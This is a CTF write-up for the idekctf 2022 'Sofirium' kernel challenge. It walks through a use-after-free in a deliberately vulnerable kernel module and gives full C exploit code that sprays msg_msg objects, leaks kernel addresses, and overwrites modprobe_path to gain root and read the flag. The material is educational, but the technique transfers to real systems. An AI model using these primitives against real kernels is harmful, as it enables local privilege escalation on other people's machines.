I was talking with a friend a few days ago, we were discussing the lack of English native-language writeups around some of the more advanced kernel exploitation techniques. So, when the challenge he authored in the most recent edition of idekctf only had 7 solves, I decided to release this writeup.

Info

There were a number of ‘unintended’ solves for this challenge caused by the infrastructure configuration. This writeup obviously ignores this, and focuses on a more ‘intended’ solution.

Sofirium was a pwn challenge in idekctf 2022, a full QEMU image was provided, along with the source code of an exploitable kernel module.

Info

You can download the challenge from the official idekctf 2022 repository here

There is a build.sh file, containing the command to start the QEMU virtual machine.

QEMU Build Script
#!/bin/sh
 
KERNEL_PATH="../bzImage"
 
if [ -z "$1" ]
then
    echo "NO CPIO"
    return 1
fi
 
if [ -z "$2" ]
then
    echo "NO EXPLOIT"
    qemu-system-x86_64 \
    -m 256M\
    -kernel $KERNEL_PATH \
    -initrd $1  \
    -cpu kvm64,+smep,+smap \
    -append "console=ttyS0 oops=panic panic=1 kpti=1 nokaslr quiet" \
    -monitor /dev/null \
    -serial mon:stdio \
    -virtfs local,path=/tmp,mount_tag=host0,security_model=passthrough,id=foobar \
    -nographic -s
else
    echo "YASS EXPLOIT"
    echo "Compiled $2"
    gcc -static $2 -o $2.c -lpthread
    qemu-system-x86_64 \
    -m 256M\
    -kernel $KERNEL_PATH \
    -initrd $1  \
    -cpu kvm64,+smep,+smap \
    -append "console=ttyS0 oops=panic panic=1 kpti=1 kaslr quiet" \
    -drive file=$2.c,format=raw \
    -monitor /dev/null \
    -serial mon:stdio \
    -virtfs local,path=/tmp,mount_tag=host0,security_model=passthrough,id=foobar \
    -nographic -s
fi

When an exploit script is provided as an argument to the Makefile operation, (this is how it runs on the challenge server), the following protections are enabled:

  • Kernel Address Space Layout Randomisation (KASLR): The kernel is loaded at a random address, preventing the kernel .text segment being easily accessible without a kernel leak.
  • Supervisor Mode Execution Prevention (SMEP): The CPU will fault if an attempt it made ot execute instructions in userspace (prevents basic ret2usr attacks)
  • Supervisor Mode Access Prevention (SMAP): The CR4 control register contains a flag preventing access to userland memory while the flag is enabled.

Kernel Module Overview

The device is made accessible to userland via an interface with 4 operations. These are defined in a file ops struct.

struct file_operations fops = {
    .open = device_open,
    .unlocked_ioctl = device_ioctl,
    .compat_ioctl = device_ioctl,
    .release = device_release,
};

Info

If you’re not familiar with the ioctl syscall, I recommend reading this article as an introduction. Essentially it provides a versatile way to provide a programmable interface for interacting with the kernel drivers to perform custom operations

The initialisation function simply registers the device with the kernel and prints some kernel log messages. The theme of the challenge seems to revolve around blockchain, though that has no relevance to the exploitation of the challenge itself.

Info

Every device in Linux is identified by a major and minor number. The kernel uses the major number to identify the driver associated with a device, the driver uses minor numbers to identify individual devices belonging to it.

int init_module(void) {
    Major_num = register_chrdev(0, proc_name, &fops);
    if (Major_num < 0) {
        printk(KERN_INFO "Failed to register device, major num returned %d",
        Major_num);
        return Major_num;
    }
    printk(KERN_INFO "Sucessfully registered device, major num returned %d", Major_num);
    printk(KERN_INFO "'mknod /dev/%s c %d 0'.\n", proc_name, Major_num);
 
        printk(KERN_INFO "Welcome to Sofirium, the greatest blockchain to exist");
        return 0;
    }

The cleanup, open, and release functions do not contain any particularly interesting code.

The device_ioctl Function

The bulk of the functionality is contained in the device_ioctl function. It takes 3 arguments, a file pointer, and ioctl command code, and an argument. The command is used to determine which operation to perform, and the argument is a pointer to a request struct defined in the kernel module header source.

typedef struct request{
    int idx;
    char buffer[CHUNK_SIZE];
} request;

It first copies the request struct from userland into kernel space using copy_from_user.

long device_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
    sofirium_entry* next;
    sofirium_entry* new;
    sofirium_entry* target;
    sofirium_entry* tmp;
    request req;
    int total_nft;
 
    if (copy_from_user(&req, (void*)arg, sizeof(request))) {
        printk(KERN_INFO "Copy Request from User Error");
        return -EFAULT;
    }

There is then a switch-case statement, depending on the ioctl command code (0x1337, 0xdeadbeef, 0xcafebabe, 0xbabecafe), the driver will perform one of the following

Operation 0x1337

The 0x1337 command frees all the chunks contained by the head linked list by iterating over the next attribute. An interesting thing to note here is that the pointers in the linked list are not removed after the chunk is freed, this could potentially lead to a use-after-free.

case 0x1337:
    debug_print(KERN_INFO "Deleting Blockchain: Sofirium is Bad");
 
    next = head->head;
    total_nft= head->total_nft;
    kfree(head);
 
    for (int i = 0; i < total_nft; i ++){
        debug_print(KERN_INFO "Freeing Buffer 0x%px\nNEXT: 0x%px", tmp, next->next);
        tmp = next;
        next = next->next;
        kfree(tmp);
    }
 
    return 1;

Operation 0xdeadbeef

The 0xdeadbeef command seems to control the chunk allocation logic. The first thing it does is check if the head pointer is NULL. If so, a sofirium_entry struct is allocated and the head pointer is set to point to it. If not, a sofirium_entry struct is allocated but the next pointer of the target (most recently allocated chunk) is set to point to it.

case 0xdeadbeef:
 
    if (head == NULL){
        head = kmalloc(sizeof(sofirium_head), GFP_KERNEL);
        head->total_nft = 0;
        strlcpy(head->coin_art, sofirium_art, sizeof(head->coin_art));
 
        printk(KERN_INFO "%s", head->coin_art);
 
        head->head = NULL;
        debug_print(KERN_INFO "Head NULL, Creating sofirium_head at 0x%px", head);
    }
 
    if (head->total_nft == 0){
        new = kmalloc(sizeof(sofirium_entry), GFP_KERNEL);
        new->next = NULL;
        memcpy(new->nft, req.buffer, CHUNK_SIZE);
        head->head = new;
        head->total_nft = 1;
    }
 
    else{
        target = head->head;
        for (int i=1; i < head->total_nft; i++){
            target = target->next;
        }
        new = kmalloc(sizeof(sofirium_entry), GFP_KERNEL);
        new->next = NULL;
        memcpy(new->nft, req.buffer, CHUNK_SIZE);
        target->next = new;
        head->total_nft ++;
    }
 
    debug_print(KERN_INFO "NEW NFT: %s @ 0x%px \n",new->nft, new);
    return head->total_nft;

Operation 0xcafebabe

The 0xcafebabe command is used to read the contents of a chunk. It iterates over the linked list until the idx specified in the request struct argument is reached. The nft attribute of the chunk is then copied into the buffer attribute of the request struct, and the request struct is copied back into userland using copy_to_user.

case 0xcafebabe:
    target = head->head;
    for (int i=0; i < req.idx; i++){
        debug_print(KERN_INFO "Walked over entry 0x%px", target->next);
        target = target->next;
    };
 
 
 
    debug_print(KERN_INFO "Copy to user %s @ 0x%px", target->nft, target->nft);
    if(copy_to_user((void*)arg+offsetof(struct request, buffer),target->nft, sizeof(target->nft))){
        printk(KERN_INFO "Copy to user failed, exiting");
        return -EFAULT;
    }
    return 0;

0xbabecafe

The 0xbabecafe command provides functionality to alter the contents of a chunk. Similar to the 0xcafebabe command, first the linked list is iterated over until the idx specified in the request struct argument is reached. Once the correct chunk has been identified, copy_from_user is used to copy the contents of the buffer attribute of the request struct into the nft attribute of the chunk.

case 0xbabecafe:
    target = head->head;
    for (int i=0; i < req.idx; i++){
        debug_print(KERN_INFO "Walked over entry %px", target->next);
        target = target->next;
    };
 
    if(copy_from_user(target->nft, (void*)arg+offsetof(struct request, buffer),sizeof(target->nft))){
        printk(KERN_INFO "Copy from user failed exiting");
        return -EFAULT;
    }
    debug_print(KERN_INFO "Copy from user %s to 0x%px", target->nft, target->nft);
 
    return 0;
default:
    return 0xffff;
}

Summary of Findings

A few things can be deduced from the code:

  • There a Use-After-Free bug, which may allow the two operations specified above to be used on freed chunks.
    • Combined with 0xcafebabe, this could be used to leak kernel memory.
    • Combined with 0xbabecafe, this could be used to overwrite kernel memory.
  • These primitives combined should be enough to achieve arbitrary code execution.

Exploitation

To leverage the UAF into something useful, some infoleaks are required. Since the QEMU VM has been configured with the full myriad of protections, leaking the kernel base is essential, which will probably require first leaking the kernel heap.

Kernel Heap Leak

Acquiring a kernel heap leak required a fairly comprehensive understanding of the kernel’s heap allocator and how various structures are used by the kernel. The Linux kernel allocator works differently to the libc allocator (which you would be familiar with from most userland based heap exploitation challenges), so first I’ll give a brief overview of how the kernel allocator works.

The Linux kernel (currently) uses two allocators for handling dynamic kernel memory - the buddy allocator and the slab allocator. The important allocator for this challenge is the slab allocator. The slab allocator is made up of a number of caches, there are two types of cache

  • General purpose caches. Sorted into powers of 2 (e.g kmalloc-64, kmalloc-128, kmalloc-256)
  • Specialised caches, used for commonly used structure such as struct task_struct or struct mm_struct.

The 0x100 chunk allocated by the target kernel driver will come from the kmalloc-256 cache.

Info

Rather than me butchering an explanation of these allocators, I’d recommend reading this awesome article.

I found an article that describes some structures used to achieve various types of kernel manipulation, one such structure is msg_msg. To understand why, a dive into the kernel source code is required.

The msg_msg structure

The msg_msg struct is used by multiple system calls, such as msgsnd, msgrcv, msgctl and msgget. The struct is stored in the kernel heap, and is defined as the following

struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;		/* message text size */
    struct msg_msgseg *next;
    void *security; /* the actual message follows immediately */
};

When a msgsnd system call is made, execution jumps into the corresponding kernel function do_msgsnd.

long do_msgsnd(int msqid, long mtype, void __user *mtext,
size_t msgsz, int msgflg)
{
[...]
    ns = current->nsproxy->ipc_ns;
 
    if (msgsz > ns->msg_ctlmax || (long) msgsz < 0 || msqid < 0)
            return -EINVAL;
    if (mtype < 1)
            return -EINVAL;
 
    msg = load_msg(mtext, msgsz); <-- calls load_msg to retrieve message from userland
[...]

do_msgsnd calls the load_msg function, providing a pointer to the userland buffer containing the message.

struct msg_msg *load_msg(const void __user *src, size_t len)
{
    struct msg_msg *msg;
    struct msg_msgseg *seg;
    int err = -EFAULT;
    size_t alen;
 
        msg = alloc_msg(len);
        if (msg == NULL)
                return ERR_PTR(-ENOMEM);
 
        alen = min(len, DATALEN_MSG);
        if (copy_from_user(msg + 1, src, alen)) <-- data is retived from userland
                goto out_err;
 
        for (seg = msg->next; seg != NULL ; seg = seg->next) {
                len -= alen;
                src = ( char __user *)src + alen;
                len = min(len, DATALEN_SEG); if (copy_from_user(seg + 1 , src, alen)) goto out_err;     <-- again here
}

The data is copied from userland into the msg_msg struct named msg using copy_from_user.

Warning

One important thing to note here, there is a limitation with this structure in terms of exploitation. The first 48 bytes of the msg_msg struct are used for storing metadata, and the actual message data is stored after the 48 byte mark. It’s worth remembering the 48 bytes of uncontrolled data prepending the user controlled buffer when trying to leverage msg_msg for infoleaks or write primitives.

So, to leverage msg_msg to gain an infoleak with the UAF:

  1. Allocate a kernel chunk using the kernel driver operation 0xdeadbeef (always chunk size 0x100)
  2. Free the kernel object.
  3. Spray msg_msg structs of size 0x100 into the kernel heap via the msgget and msgsend system calls. One of the structs should occupy the chunk just freed.
  4. Allocate a chunk using the 0xdeadbeef operation, due to the UAF, the kernel driver will write the address of the newly allocated chunk into the freed chunks’s next field, which is now actually a msg_msg struct.
  5. Use the msgrcv system call to copy the msg_msg struct into userland. The struct now container a pointer to a sofirium_entry struct, kernel heap addresses will be coped into userland and can be read by us.

Inversely, the msgrcv system call causes a jump into the do_msgrcv function. If the MSG_COPY flag is set, the kernel will call prepare_copy

static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
    int mode;
    struct msg_queue *msq;
    struct ipc_namespace *ns;
    struct msg_msg *msg, *copy = NULL;
    DEFINE_WAKE_Q(wake_q);
 
    ns = current->nsproxy->ipc_ns;
 
    if (msqid < 0 || (long) bufsz < 0)
        return -EINVAL;
 
    if (msgflg & MSG_COPY) { <-- MSG_COPY must be set
        if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
            return -EINVAL;
        copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax)); <-- to call prepare_copy
        if (IS_ERR(copy))
            return PTR_ERR(copy);
    }
    mode = convert_mode(&msgtyp, msgflg);
[...]

prepare_copy is interesting because it uses a memcpy to copy the msg data into the copy struct.

struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst)
{
    struct msg_msgseg *dst_pseg, *src_pseg;
    size_t len = src->m_ts;
    size_t alen;
 
    if (src->m_ts > dst->m_ts)
        return ERR_PTR(-EINVAL);
 
    alen = min(len, DATALEN_MSG);
    memcpy(dst + 1, src + 1, alen); <-- memcpy is used to replacate the structure
 
    for (dst_pseg = dst->next, src_pseg = src->next;
         src_pseg != NULL;
         dst_pseg = dst_pseg->next, src_pseg = src_pseg->next) {
 
        len -= alen;
        alen = min(len, DATALEN_SEG);
        memcpy(dst_pseg + 1, src_pseg + 1, alen);
    }
 
[...]

store_msg is eventually called to copy the msg_msg objects data back into userland via copy_to_user.

int store_msg(void __user *dest, struct msg_msg *msg, size_t len)
{
    size_t alen;
    struct msg_msgseg *seg;

    alen = min(len, DATALEN_MSG);
    if (copy_to_user(dest, msg + 1, alen)) <-- copy back into userland
        return -1;

    for (seg = msg->next; seg != NULL; seg = seg->next) {
        len -= alen;
        dest = (char __user *)dest + alen;
        alen = min(len, DATALEN_SEG);
        if (copy_to_user(dest, seg + 1, alen))
            return -1;
    }
    return 0;
}

With this knowledge, it becomes clear how to leverage this structure to gain an arbitrary write primitive when combined with a UAF.

  1. Allocate a kernel chunk using the kernel driver operation 0xdeadbeef (always chunk size 0x100)
  2. Free the kernel object.
  3. Spray msg_msg structs of size 0x100 into the kernel heap via the msgget and msgsend system calls. One of the structs should occupy the chunk just freed. The data in the msg_msg struct contain the address to overwrite, which will be the target->nft attribute of the freed chunk.
  4. Write into the free chunk using the 0xbabecafe command, copy_from_user will copy the data from request->buffer into the address pointed to by target->nft.

The following code leaks the heap reliably.

kernel heap leak
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
 
 
#define CHUNK_SIZE 0x100
#define MSG_SIZE CHUNK_SIZE / 2 - 48 // msg_msg has a 48 byte header
#define MSG_SPRAY_SIZE 0x10
 
#define IOCTL_DESTROY 0x1337
#define IOCTL_ALLOC 0xdeadbeef
#define IOCTL_READ 0xcafebabe
#define IOCTL_EDIT 0xbabecafe
 
// #define DEBUG
#if defined DEBUG
#define LOG(fmt, ...)    printf(fmt, __VA_ARGS__);
#else
#define LOG(fmt, ...)    /* empty when debugging disabled */
#endif
 
int module_fp;
int msqid_array[MSG_SPRAY_SIZE];
 
typedef struct request{
    int idx;
    char buffer[CHUNK_SIZE];
} request;
 
// https://elixir.bootlin.com/linux/v4.19.98/source/include/linux/msg.h#L9
typedef struct msg_msg_struct {
    long mtype;
    char mtext[MSG_SIZE];
} msg_msg_struct;
 
 
void free_blockchain()
{
    struct request request_struct;
    request_struct.idx = '\x00';
 
    LOG("%s Freeing blockchain\n", "[DEBUG]");
    long ioctl_return = ioctl(module_fp, IOCTL_DESTROY,&request_struct);
    if ( ioctl_return < 0 )
    {
        printf("[CRITICAL] Something went wrong freeing blockchain\n");
        exit(1);
    }
}
 
int alloc(char *buffer){
    /* Use 0xdeadbeef command to allocate a chunk */
    struct request request_struct;
    request_struct.idx = 0;
 
    memcpy(request_struct.buffer, buffer, CHUNK_SIZE );
    long ioctl_return = ioctl(module_fp, IOCTL_ALLOC,&request_struct);
    if ( ioctl_return < 0 )
    {
        printf("[CRITICAL] Something went wrong allocating chunk. Got chunk index %ld\n\n", ioctl_return);
        exit(1);
    }
    else
        LOG("%s allocating chunk. Got return code %ld\n\n", "[DEBUG]", ioctl_return);
 
    return ioctl_return;
}
 
 
void spray_msg_msg(char *buffer)
{
    /* Spray into the  */
    struct msg_msg_struct msg;
    msg.mtype = 1;
    memcpy(msg.mtext, buffer, MSG_SIZE);
    msg.mtext[MSG_SIZE - 1] = 0;
 
    puts("[INFO] Spraying msg_msg struct into kernel heap");
    for(int i = 0; i < MSG_SPRAY_SIZE; i ++)
    {
        msqid_array[i] = msgget(IPC_PRIVATE, 0644  | IPC_CREAT);
        msgsnd(msqid_array[i], &msg, sizeof(msg.mtext), 0);
    }
}
 
unsigned long long leak_heap(){
    int i;
 
    char cruff_buf[MSG_SIZE];
    memset(cruff_buf, 0, MSG_SIZE);
    spray_msg_msg(cruff_buf);
 
    alloc("FOOBAR");
    puts("[INFO] Freeing msg_msg chunks from kernel heap");
    msg_msg_struct msg;
    for(i = 0; i < MSG_SPRAY_SIZE; i ++){
        if(msgrcv(msqid_array[i], &msg, sizeof(msg.mtext), 1, IPC_NOWAIT ) < 0)
        {
            puts("[CRITICAL] msgrcv failed");
            exit(0);
        }
 
        if(((long long*)msg.mtext)[8] != 0){
            return ((long long*)msg.mtext)[8];
        }
    }
 
    puts("[CRITICAL] No leak found! Exiting");
    exit(1);
}
 
int main(int argc, char *argv[])
{
    int i;
    unsigned long ret;
    unsigned long long leaks[0x100 / 8];
    module_fp = open("/dev/Sofire", O_RDONLY);
 
    alloc("\x00");
    free_blockchain();
 
    unsigned long long heap_leak = leak_heap();
    printf("[SUCCESS] Kernel heap leak: 0x%llx\n", heap_leak);
}

With the heap leak finished, we can move into leaking the kernel base.

Kernel Heap Leak

Leaking the Kernel Base

Initially, I spend a while trying to groom the heap so that timerfd_ctx structs were allocated at a consistent offset to the leaked heap address. They are of size 0x100 as well, so I had hoped that by spraying a large number of timers into the heap it would cause some to land near the target chunk. However, I was unable to get this to work reliably, possibly due to the effects of the heap corruption caused while getting the heap leak. If you have tips on how to do this effectively, or know what I might have been doing wrong, please contact me!

Since the CTF is running inside a BusyBox VM, it’s not particularly active. This means I was able to simply parse the heap looking other structures, in GDB and found that pointers to sysfs_file_kfops_rw were littered throughout the heap.

Running the heap leak exploit code:

One such structure exists at offset of 0xcc0 from the heap leak.

sysfs_file_kfops_rw pointer

I created two additional functions for the read primitive, I wrote a generic arbitrary primitive function so that that section of code could be reused by the write primitive, when we get to writing that.

unsigned long long *arbitrary_primitive(unsigned long long *payload, unsigned long long addr)
{
 
    payload[8] = addr - 8;
 
    spray_msg_msg((char *)payload);
    return payload;
}
 
void arbitrary_read(unsigned long long addr, unsigned long long *leaks){
    unsigned long long payload[0x100];
 
    arbitrary_primitive(payload, addr);
    memcpy(leaks, read_chunk(0), 0x100);
 
}

By extending the main function to execute the arbitrary read, we get a reliable kernel leak.

arbitrary_read(heap_leak + 0xcc0, leaks);
printf("[SUCCESS] Leaked sysfs_file_kfops_rw: 0x%llx\n", leaks[0]);
 
unsigned long long kernel_base = leaks[0] - SYSFS_FILE_KFOPS_RW_OFFSET;
unsigned long long modprobe_address = kernel_base + MODPROB_PATH_OFFSET;
 
printf("[+] Calculated the kernel base: 0x%llx\n", kernel_base);

Read primitive works

Kernel Write Primitive

The theory for the write primitive has already been discussed, only a little more code is required to add the functionality to the exploit script.

modprobe_path

The modprobe_path is a global variable in the kernel which specifies the path to the modprob program. It’s accessible to userland via the /proc/sys/kernel/modprobe file. As explained in this blog; when an execve call is made on a file with an unknown file signature, an execution chain is triggered which ends in a call to call_modprob. Essentially, whichever file is specified in modprobe_path global variable will be executed.

Overwriting modprobe_path

We can add an arbitrary_write function to the exploit code, that uses the arbitrary_primitive function to perform the msg_msg heap spray, the difference between the read and write primitive is that read copies data from the request buffer, while the write primitive positions the address to overwrite using the msg_msg spray, and then uses 0xcafebabe ioctl to write data into that chunk. If all goes well, this chunk will be the global variable modprob_path.

This was the final exploit

Final Exploit
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
 
 
#define CHUNK_SIZE 0x100
#define MSG_SIZE CHUNK_SIZE / 2 - 48 // msg_msg has a 48 byte header
#define MSG_SPRAY_SIZE 0x10
 
#define MODPROB_PATH_OFFSET 0x1851400
#define SYSFS_FILE_KFOPS_RW_OFFSET 0x1227720
 
#define IOCTL_DESTROY 0x1337
#define IOCTL_ALLOC 0xdeadbeef
#define IOCTL_READ 0xcafebabe
#define IOCTL_EDIT 0xbabecafe
 
// #define DEBUG
 
#if defined DEBUG
#define LOG(fmt, ...)    printf(fmt, __VA_ARGS__);
#else
#define LOG(fmt, ...)    /* empty when debugging disabled */
#endif
 
// global variable so it can be accessed by all the functions
int module_fp;
int msqid_array[MSG_SPRAY_SIZE];
 
 
typedef struct request{
int idx;
char buffer[CHUNK_SIZE];
} request;
 
 
// https://elixir.bootlin.com/linux/v4.19.98/source/include/linux/msg.h#L9
typedef struct msg_msg_struct {
long mtype;
char mtext[MSG_SIZE];
} msg_msg_struct;
 
 
void free_blockchain()
{
struct request request_struct;
request_struct.idx = '\x00';
 
    LOG("%s Freeing blockchain\n", "[DEBUG]");
    long ioctl_return = ioctl(module_fp, IOCTL_DESTROY,&request_struct);
    if ( ioctl_return < 0 )
    {
        printf("[CRITICAL] Something went wrong freeing blockchain\n");
        exit(1);
    }
 
}
 
void create_timer()
{
// per https://www.willsroot.io/2020/10/cuctf-2020-hotrod-kernel-writeup.html
struct itimerspec timespec = {{10, 0}, {10, 0}};
 
    int tfd = timerfd_create(CLOCK_REALTIME, 0);
    timerfd_settime(tfd, 0, &timespec, 0);
}
 
int alloc(char *buffer){
struct request request_struct;
request_struct.idx = 0;
 
    memcpy(request_struct.buffer, buffer, CHUNK_SIZE );
    long ioctl_return = ioctl(module_fp, IOCTL_ALLOC,&request_struct);
    if ( ioctl_return < 0 )
    {
        printf("[CRITICAL] Something went wrong allocating chunk. Got chunk index %ld\n\n", ioctl_return);
        exit(1);
    }
    else
        LOG("%s allocating chunk. Got return code %ld\n\n", "[DEBUG]", ioctl_return);
 
    return ioctl_return;
}
 
char *read_chunk(long idx)
{
struct request request_struct;
request_struct.idx = idx;
 
    long ioctl_return = ioctl(module_fp, IOCTL_READ,&request_struct);
    char* return_data = (char*) malloc(CHUNK_SIZE);
 
 
    // printf("(read) ioctl: return code was %ld\n", ioctl_return);
 
    memcpy(return_data, request_struct.buffer, CHUNK_SIZE);
    for(int i = 0; i < 0x100 / 8; i++){
        LOG("%s Read data from chunk %ld position %d: %p\n", "[DEBUG]", idx, i, ((void **)request_struct.buffer)[i]);
    }
    printf("\n\n");
    return return_data;
}
 
void write_chunk(int idx, char * value){
struct request request_struct;
request_struct.idx = idx;
 
    memcpy(request_struct.buffer, value, sizeof(request_struct.buffer));
    ioctl(module_fp, IOCTL_EDIT,&request_struct);
}
 
void spray_msg_msg(char *buffer)
{
struct msg_msg_struct msg;
msg.mtype = 1;
memcpy(msg.mtext, buffer, MSG_SIZE);
msg.mtext[MSG_SIZE - 1] = 0;
 
    puts("[INFO] Spraying msg_msg struct into kernel heap");
    for(int i = 0; i < MSG_SPRAY_SIZE; i ++)
    {
        msqid_array[i] = msgget(IPC_PRIVATE, 0644  | IPC_CREAT);
        msgsnd(msqid_array[i], &msg, sizeof(msg.mtext), 0);
    }
}
 
unsigned long long leak_heap(){
int i;
 
    // Prepare structure per https://xkaneiki-github-io.translate.goog/2021/06/07/kernel-heap-spray/?_x_tr_sl=fr&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp
 
    char cruff_buf[MSG_SIZE];
    memset(cruff_buf, 0, MSG_SIZE);
    spray_msg_msg(cruff_buf);
 
    alloc("FOOBAR");
 
    puts("[INFO] Freeing msg_msg chunks from kernel heap");
 
    msg_msg_struct msg;
    for(i = 0; i < MSG_SPRAY_SIZE; i ++){
        if(msgrcv(msqid_array[i], &msg, sizeof(msg.mtext), 1, IPC_NOWAIT ) < 0)
        {
            puts("[CRITICAL] msgrcv failed");
            exit(0);
        }
 
        if(((long long*)msg.mtext)[8] != 0){
            return ((long long*)msg.mtext)[8];
        }
    }
 
    puts("[CRITICAL] No leak found! Exiting");
    exit(1);
}
 
 
unsigned long long *arbitrary_primitive(unsigned long long *payload, unsigned long long addr)
{
 
    payload[8] = addr - 8;
 
    spray_msg_msg((char *)payload);
    return payload;
}
 
void arbitrary_read(unsigned long long addr, unsigned long long *leaks){
unsigned long long payload[0x100];
 
    arbitrary_primitive(payload, addr);
    memcpy(leaks, read_chunk(0), 0x100);
 
}
 
 
void arbitrary_write(unsigned long long addr, char * value){
unsigned long long payload[0x100];
 
    arbitrary_primitive(payload, addr);
    write_chunk(0, value);
}
 
 
int main(int argc, char *argv[])
{
int i;
unsigned long ret;
unsigned long long leaks[0x100 / 8];
module_fp = open("/dev/Sofire", O_RDONLY);
 
    system("echo -e '#!/bin/sh\nchmod 777 /flag.txt\n' > /tmp/xxxx && chmod +x /tmp/xxxx");
    system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/dummy && chmod +x /tmp/dummy");
 
    // spray the timers around the chunk that will (hopefully) be used for the blockchain chunk
    // and contain pointers usable to leak the kernel unlike msg msg
 
    alloc("\x00");
 
 
    free_blockchain();
 
 
    unsigned long long heap_leak = leak_heap();
    printf("[SUCCESS] Kernel heap leak: 0x%llx\n", heap_leak);
 
 
    arbitrary_read(heap_leak + 0xcc0, leaks);
 
    printf("[SUCCESS] Leaked sysfs_file_kfops_rw: 0x%llx\n", leaks[0]);
 
    unsigned long long kernel_base = leaks[0] - SYSFS_FILE_KFOPS_RW_OFFSET;
    unsigned long long modprobe_address = kernel_base + MODPROB_PATH_OFFSET;
 
    printf("[+] Calculated the kernel base: 0x%llx\n", kernel_base);
    printf("[+] Calculated address of modprob_path: 0x%llx\n", modprobe_address);
 
 
    free_blockchain();
    arbitrary_write(modprobe_address, "/tmp/xxxx");
 
    system("/tmp/dummy"); // trigger call to modprob_path
    system("ls -la /flag.txt");
    system("cat /flag.txt");
    return 0;
 
}

This works about 1 in every 4 attempts.

Exploit on non KASLR System

To update the exploit for KASLR, all that was required was updating the offset to sysfs_file_kfops_rw to be 0xc40 rather than 0xcc0 on line 209. We got the flag :raised_hands:. Interestingly, the exploit is significantly more reliable on the KASLR enabled VM.

Exploit on KASLR System

Wrapping Up

I really enjoyed the challenge. There were a number of times I hit dead ends, such as attempting to spray timerfd_ctx structs into the heap before having to switch tac. I had hoped it would be possible to actually hijack control flow inside the kernel, alas that will need to wait for another day,

To summarise

  • The challenge was a heap based kernel pwn, focussed on exploiting a UAF vulnerability in the kernel module
  • msg_msg objects allowed for the creation of arbitrary read/write primitives, providing an attack path to leak the kheap and .text sections of the kernel, and then overwrite the modprobe_path global variable to execute arbitrary code when an unknown filetype is executed.

If I get the time, I will take more of a look at the following:

  • The timerfd_ctx spray, and how it could have been used to leak the kernel, and potentially the heap
  • Utilising the arbitrary write to hijack control flow in the kernel, perhaps using heap objects to KROP

References